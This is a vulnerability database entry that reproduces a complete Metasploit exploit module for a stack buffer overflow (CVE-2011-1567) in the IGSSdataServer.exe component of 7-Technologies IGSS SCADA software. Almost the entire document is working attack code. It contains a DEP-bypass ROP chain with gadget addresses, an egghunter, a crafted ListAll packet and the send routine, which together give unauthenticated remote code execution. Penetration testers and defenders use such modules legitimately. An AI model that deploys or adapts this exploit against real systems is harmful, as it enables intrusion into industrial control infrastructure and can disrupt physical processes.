7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow

2011-05-16T19:02:05
ID MSF:EXPLOIT/WINDOWS/SCADA/IGSS9_IGSSDATASERVER_LISTALL
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application fails to do proper bounds checking before copying data into a small buffer on the stack. This causes a buffer overflow and allows to overwrite a structured exception handling record on the stack, allowing for unauthenticated remote code execution. Also, after the payload exits, IGSSdataServer.exe should automatically recover.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::Tcp

  def initialize(info={})
    super(update_info(info,
      'Name'           => "7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies
        IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application
        fails to do proper bounds checking before copying data into a small buffer on the stack.
        This causes a buffer overflow and allows to overwrite a structured exception handling record
        on the stack, allowing for unauthenticated remote code execution.  Also, after the payload
        exits, IGSSdataServer.exe should automatically recover.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Luigi Auriemma', #Initial discovery, poc
          'Lincoln',        #Metasploit
          'corelanc0d3r <peter.ve[at]corelan.be>',   #Rop exploit, combined XP SP3 & 2003 Server
          'sinn3r',         #Serious Msf style policing
        ],
      'References'     =>
        [
          ['CVE', '2011-1567'],
          ['OSVDB', '72353'],
          ['URL', 'http://aluigi.altervista.org/adv/igss_2-adv.txt'],
          ['URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-11-132-01A.pdf']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)',
            {
              'Ret'    => 0x1b77ca8c,  #dao360.dll pivot 1388 bytes
              'Offset' => 500
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Mar 24 2011",
      'DefaultTarget'  => 0))

      register_options(
      [
        Opt::RPORT(12401)
      ])
  end

  def junk
    return rand_text(4).unpack("L")[0].to_i
  end

  def exploit

    eggoptions =
    {
      :checksum => false,
      :eggtag => 'w00t',
      :depmethod => 'virtualprotect',
      :depreg => 'esi'
    }

    badchars = "\x00"
    hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)

    #dao360.dll - pvefindaddr rop 'n roll
    rop_chain = [
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b72f174,  # POP EAX # RETN 08
      0xA1A10101,
      0x1b7762a8,  # ADD EAX,5E5F0000 # RETN 08
      junk,
      junk,
      0x1b73a55c,  # XCHG EAX,EBX # RETN
      junk,
      junk,
      0x1b724004,  # pop ebp
      0x1b72f15f,  # &push esp # retn 8
      0x1b72f040,  # POP ECX # RETN
      0x1B78F010,  # writeable
      0x1b7681c2,  # xor eax,eax # retn
      0x1b72495c,  # add al,40 # mov [esi+4],eax # pop esi # retn 4
      0x41414141,
      0x1b76a883,  # XCHG EAX,ESI # RETN 00
      junk,
      0x1b7785c1,  # XOR EDX,EDX # CMP EAX,54 # SETE DL # MOV EAX,EDX # ADD ESP,8 # RETN 0C
      junk,
      junk,
      0x1b78535c,  # ADD EDX,ESI # SUB EAX,EDX # MOV DWORD PTR DS:[ECX+F8],EAX # XOR EAX,EAX # POP ESI # RETN 10
      junk,
      junk,
      junk,
      junk,
      0x1b7280b4,  # POP EDI # XOR EAX,EAX # POP ESI # RETN
      junk,
      junk,
      junk,
      junk,
      0x1b7681c4,  # rop nop (edi)
      0x90909090,  # esi -> eax -> nop
      0x1b72f174,  # POP EAX # RETN 08
      0xA1F50214,  # offset to &VirtualProtect
      0x1b7762a8,  # ADD EAX,5E5F0000 # RETN 08
      junk,
      junk,
      0x1b73f3bd,  # MOV EAX,DWORD PTR DS:[EAX] # RETN
      junk,
      junk,
      0x1b76a883,  # XCHG EAX,ESI # RETN 00
      0x1b72f040,  # pop ecx
      0x1B78F010,  # writeable (ecx)
      0x1b764716,  # PUSHAD # RETN
    ].pack('V*')

    header  = "\x00\x04"  #Size
    header << "\x01\x00\x34\x12"
    header << "\x0D"      #Opcode
    header << "\x00\x00\x00\x00\x00\x00\x00"
    header << "\x01"      #Flag
    header << "\x00\x00\x00"
    header << "\x01"      #Command (ListAll)
    header << "\x00\x00\x00"
    header << rand_text(14)
    sploit = rop_chain
    sploit << "\x90" * 10
    sploit << hunter
    sploit << rand_text(target['Offset'] - (sploit.length))
    sploit << [target.ret].pack('V')
    sploit << egg
    sploit << rand_text(2000)

    connect
    print_status("Sending request...")
    sock.put(header + sploit)
    handler
    disconnect

  end
end